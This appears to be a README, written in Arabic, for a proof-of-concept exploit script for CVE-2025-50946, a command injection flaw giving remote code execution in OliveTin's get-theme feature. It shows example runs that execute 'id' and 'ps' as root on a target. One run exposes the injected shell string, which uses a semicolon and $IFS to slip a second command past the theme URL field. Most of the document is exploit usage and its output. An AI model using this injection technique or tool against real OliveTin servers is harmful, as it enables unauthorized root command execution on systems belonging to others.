
نص برمجي لاستغلال CVE-2025-50946
نص برمجي لاستغلال CVE-2025-50946 (OliveTin get-theme RCE). متطلبات الأحرف صعبة والعديد من الأوامر التي تتضمن وسائط متعددة قد لا تُنفَّذ بشكل صحيح. لم آخذ الوقت الكافي لمعرفة السبب الجذري أو محاولة جعل البرنامج النصي أكثر متانة. راسلني أو افتح PR إذا كنت بحاجة إلى شيء.
يعود الفضل إلى chrisWalker11 في البحث الأصلي الذي بنيت عليه هذا البرنامج النصي: الرابط
PoC أساسي:
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
قائمة العمليات (تُظهر مقتطفًا فقط من المخرجات):
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH